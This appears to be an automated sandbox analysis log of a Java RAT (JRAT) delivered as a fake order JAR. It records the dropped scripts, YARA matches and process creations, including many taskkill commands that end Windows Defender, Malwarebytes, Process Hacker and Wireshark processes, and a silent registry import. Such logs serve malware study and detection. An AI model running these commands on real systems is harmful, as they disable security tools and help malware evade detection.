        Source: api-ms-win-crt-multibyte-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l2-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-datetime-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-heap-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-debug-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-conio-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-time-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-handle-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-util-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-runtime-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-interlocked-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-stdio-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-math-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
        Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
        Source: classification engineClassification label: mal100.phis.troj.expl.evad.winJAR@196/300@1/2
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeFile created: C:\Users\user\zbrspjjraf.jsJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.jsJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.classJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /eJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
